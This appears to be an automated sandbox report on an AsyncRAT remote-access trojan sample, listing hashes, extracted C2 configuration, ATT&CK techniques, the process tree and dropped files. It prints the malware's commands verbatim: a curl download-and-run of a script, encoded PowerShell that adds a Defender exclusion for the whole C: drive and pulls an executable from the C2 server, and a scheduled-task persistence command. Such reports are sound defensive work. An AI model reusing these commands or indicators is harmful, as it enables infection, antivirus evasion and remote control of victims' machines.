asyncrat | 49fcfcbb8cc1c85f2c7ec36eb139df3b70b898689b8e7f58b7c054ca900a9ce4

Analysis

max time kernel
4s
max time network
25s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
29/03/2025, 23:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

evo.gj.exe
Size

2.8MB
MD5

dee0ebab182b215c4e1fb1c7da903d8a
SHA1

84c3444a053cb709a4dd9b9928b40b4373b78732
SHA256

49fcfcbb8cc1c85f2c7ec36eb139df3b70b898689b8e7f58b7c054ca900a9ce4
SHA512

fa9c0d00dfb679a4d1c324390bcf2f8d562cf779e4f5487cb508f7167842c3453f545db593a218df3633aa36de98578115b9eaff7cd7b59969b1b264f78deb5c
SSDEEP

49152:z7YGtlq/IU6iZXNVxrGiPsPAmpoAzjicaCNH2kLLKevfQfGVGNPq0ATmn9/:X9+brGiPoB421fQOVGU05

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://3.27.199.84:3000/RuntimeBrokerSvc.exe

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

3.27.199.84:9182

Mutex

gRLpFG01LHh3

Attributes

delay
3
install
true
install_file
RuntimeBrokerSvc.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x0007000000024188-333.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3468	powershell.exe

Downloads MZ/PE file

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
38	discord.com
39	discord.com
40	discord.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\a.txt	wscript.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2084	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2700	schtasks.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3132	evo.gj.exe
3132	evo.gj.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
3768	msedge.exe
3768	msedge.exe
3768	msedge.exe
3768	msedge.exe
3768	msedge.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3768	msedge.exe
3768	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3132 wrote to memory of 628	3132	evo.gj.exe	87
PID 3132 wrote to memory of 628	3132	evo.gj.exe	87
PID 628 wrote to memory of 3768	628	cmd.exe	88
PID 628 wrote to memory of 3768	628	cmd.exe	88
PID 3132 wrote to memory of 4004	3132	evo.gj.exe	90
PID 3132 wrote to memory of 4004	3132	evo.gj.exe	90
PID 4004 wrote to memory of 4112	4004	cmd.exe	91
PID 4004 wrote to memory of 4112	4004	cmd.exe	91
PID 3768 wrote to memory of 4652	3768	msedge.exe	93
PID 4112 wrote to memory of 2892	4112	cmd.exe	92
PID 3768 wrote to memory of 4652	3768	msedge.exe	93
PID 4112 wrote to memory of 2892	4112	cmd.exe	92
PID 3768 wrote to memory of 2688	3768	msedge.exe	94
PID 3768 wrote to memory of 2688	3768	msedge.exe	94
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95
PID 3768 wrote to memory of 4884	3768	msedge.exe	95

C:\Users\Admin\AppData\Local\Temp\evo.gj.exe
"C:\Users\Admin\AppData\Local\Temp\evo.gj.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start https://discord.gg/7drg5EN8hm
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:628
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/7drg5EN8hm
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:3768
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x2dc,0x7fff4e6ef208,0x7fff4e6ef214,0x7fff4e6ef220
      4⤵
      PID:4652
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1880,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:3
      4⤵
      PID:2688
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2240,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2
      4⤵
      PID:4884
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2448,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=2832 /prefetch:8
      4⤵
      PID:4560
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3540,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:1
      4⤵
      PID:5108
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3564,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:1
      4⤵
      PID:2692
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4252,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=4284 /prefetch:1
      4⤵
      PID:4424
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4260,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=4288 /prefetch:2
      4⤵
      PID:1412
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5176,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=5184 /prefetch:8
      4⤵
      PID:2500
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3840,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=3916 /prefetch:8
      4⤵
      PID:1128
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5340,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=5500 /prefetch:1
      4⤵
      PID:4208
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5728,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=5756 /prefetch:8
      4⤵
      PID:4624
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5720,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=5780 /prefetch:8
      4⤵
      PID:4632
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5168,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=6048 /prefetch:8
      4⤵
      PID:1888
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5172,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=6008 /prefetch:8
      4⤵
      PID:4684
  - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5316,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=3928 /prefetch:8
      4⤵
      PID:388
  - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5316,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=3928 /prefetch:8
      4⤵
      PID:428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /c curl -s -L -o "C:\Windows\Temp\buildtools.js" "https://www.dropbox.com/scl/fi/g6aq67bqkxahqvxyu00f4/a.js?rlkey=j35evp359i6vb6wnhp3tenoqo&st=uqv05xq0&dl=1" > NUL 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4004
- - C:\Windows\system32\cmd.exe
    cmd /c curl -s -L -o "C:\Windows\Temp\buildtools.js" "https://www.dropbox.com/scl/fi/g6aq67bqkxahqvxyu00f4/a.js?rlkey=j35evp359i6vb6wnhp3tenoqo&st=uqv05xq0&dl=1"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4112
  - - C:\Windows\system32\curl.exe
      curl -s -L -o "C:\Windows\Temp\buildtools.js" "https://www.dropbox.com/scl/fi/g6aq67bqkxahqvxyu00f4/a.js?rlkey=j35evp359i6vb6wnhp3tenoqo&st=uqv05xq0&dl=1"
      4⤵
      PID:2892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wscript "C:\Windows\Temp\buildtools.js"
  2⤵
  PID:1824
- - C:\Windows\system32\wscript.exe
    wscript "C:\Windows\Temp\buildtools.js"
    3⤵
    - Drops file in System32 directory
    PID:3532
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnACIAOwAgAHIAZQBnACAAYQBkAGQAIAAnAEgASwBMAE0AXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABFAHgAYwBsAHUAcwBpAG8AbgBzAFwAUABhAHQAaABzACcAIAAvAHYAIAAnAEMAOgBcACcAIAAvAHQAIABSAEUARwBfAFMAWgAgAC8AZAAgACcAQwA6AFwAJwAgAC8AZgA=
      4⤵
      PID:3792
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3468
    - - C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t REG_SZ /d C:\ /f
        5⤵
        
        PID:3912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAGEASABSADAAYwBEAG8AdgBMAHoATQB1AE0AagBjAHUATQBUAGsANQBMAGoAZwAwAE8AagBNAHcATQBEAEEAdgBVAG4AVgB1AGQARwBsAHQAWgBVAEoAeQBiADIAdABsAGMAbABOADIAWQB5ADUAbABlAEcAVQA9ACcAKQApACAACgAkAEIAMgAgAD0AIAAiACQAKAAkAGUAbgB2ADoAVABlAG0AcAApAFwAJAAoACgAJwBSACcALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApAFsAMAAuAC4AMgBdACAALQBqAG8AaQBuACAAJwAnACkAKwAnAEIAJwArACgAJwByACcALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApAFsAMAAuAC4AMQBdACAALQBqAG8AaQBuACAAJwAnACkAKwAnAGsAJwArACgAJwBlACcALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApAFsAMAAuAC4AMABdACAALQBqAG8AaQBuACAAJwAnACkAKwAnAHIAJwArACcALgBlAHgAZQAnACkAIgAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAEEAMQAgAC0ATwB1AHQARgBpAGwAZQAgACQAQgAyAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABCADIA
      4⤵
      PID:4412
    - - C:\Users\Admin\AppData\Local\Temp\RBrker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RBrker.exe"
        5⤵
        
        PID:4688
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "RuntimeBrokerSvc" /tr '"C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe"' & exit
        6⤵
        
        PID:4044
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "RuntimeBrokerSvc" /tr '"C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe"'
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2700
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE659.tmp.bat""
        6⤵
        
        PID:3812
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:2084
        
        C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe
        
        "C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe"
        7⤵
        
        PID:736

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\1dd8816e-ac11-4ab9-8322-638a69a6b06f.tmp

Filesize
6KB

MD5
5bfb86760a77a79d3755f852ad29fa91

SHA1
ae26552a3d4add5f99bbcd835d1b9217ce14c08d

SHA256
378d51134523e01ec5533a75b4aed8caed3afeb3eea35dca734d39b345befcb7

SHA512
809f1778624ec44ed616a0f59701b6a2992a465568ebff99804716307edabc78fe1171be997fe143eefa960bfddbc1d3b3afbbacf04a005a048913993d0ef10f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
0db1d88802048ff847bfcf47035335bd

SHA1
bb54059e5b145da464f6521ae67353889ce00771

SHA256
416525d2bfeaeab0950175c0eab55ad35e84518ef5299f10565023800788cf9a

SHA512
32c5b42febdb38c3a30eb5179b8aa20a5e731b0e83aab16ec73d27b4108bfc89eb6316f71a988388cb5df19267ba823f6d0220fab5584667ba0adb0da1152a30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
8734b4a181214bb62f91cfa36c7e2c98

SHA1
9cff323f10778a23d73ac3dcffc038d3bf661b78

SHA256
e06afe980fa56c8dad3e7c6b8d0d8f1e7eb9a4860ac715e966026fb7631c3ba5

SHA512
e8648a54da9aa24b6cba1f0377a0ce33979ea097554bb6347f252cad894ad4134e1fe839abc80eb48e2510061d5c6937e80374d32f95afd4cc8567b57694ac36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
69KB

MD5
164a788f50529fc93a6077e50675c617

SHA1
c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48

SHA256
b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17

SHA512
ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
12KB

MD5
9c7f565c1b8b562fea0a24a8afc3c597

SHA1
494dabefceb7cd66b1b82932f5df127688a30808

SHA256
326130a000eaa5b78e417ad65859f5b39467c6d629ac3f98d29fccb8c265a22d

SHA512
817741e8b64dc6ad624d0e4b38a1ee37e1aa97e5b83b56305b583f2644f455f64553647b3850a9158087ce0e728fd528443fa204af3390880e92cfc0d7e53c6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
6397662a7f1aceb98736365e763e43d2

SHA1
6d79861a8b532367089f4f38c7f0b952b7860727

SHA256
d5516c36988c940ecab999bfa467c61767fb1480b8823fb12c2a870da303dda4

SHA512
6f9a77e2d188367fa155f5e9ccaa41e1ca873d97763e26e278fa8b7f9dd8576d38dcf8a7fa4f614be317c82b8ffc5c78db84a0e7c78f6de75b90912d493fa413

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
27KB

MD5
85d4bd2c164ac8201556f6ca04a10303

SHA1
dd713a386987b1f5420c8094dc2c8fc0a5682bfc

SHA256
8f0f68d0ab910dd7a78653122e3757164dd643253ef5b3004e2094f84646794e

SHA512
e1b785614ebd4c7bd54e88c8abfa32c8f385024275b6365525290dcd36a8b2f57864dbb1c4a185088faa35c2e9d3405268275582e4dd02ee73656041bc7a30ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
4f3599575385a6de711a0666905df548

SHA1
9e3d9a899bc125e5b2440dbdbdb9144f85adfeec

SHA256
80ce0fbbb5f58367ca60792d2e77077d28ed4d8982a34bd6dcf4ce82aff10b42

SHA512
d5036ce94934b2719e97039695404fb17f7fa67554e08381d3f399f43cd7352c738959dae159a71e1ed1736b79f269eff47fee34a757c4f18a9a83dec2070008

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
aff314423d9f45f13bc7a0bcfdcac8f6

SHA1
96c1e42dbc8e527f0d83e73f1f57fc845a62af97

SHA256
31f45896870cda78e4a644e6e7321f6f3f5d2f47193a7244519abd55cea827cc

SHA512
57ca272811f545573e62f5bb736236466ffc55dc8b534b48feb00edc766ac959bc8868506c46a3813aa19a81601d39dd4c8289fb4ee96573483ec4638b79ffc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
7KB

MD5
ee66586efd247bd302d6ad493d564eb0

SHA1
63dcdc386a46478f668229bf7475ff9a430c4491

SHA256
6bfc1ae4bcbbfd34e39deabc6e20fc2d5c0c83556f7bfbc7f51134cf5d5bb725

SHA512
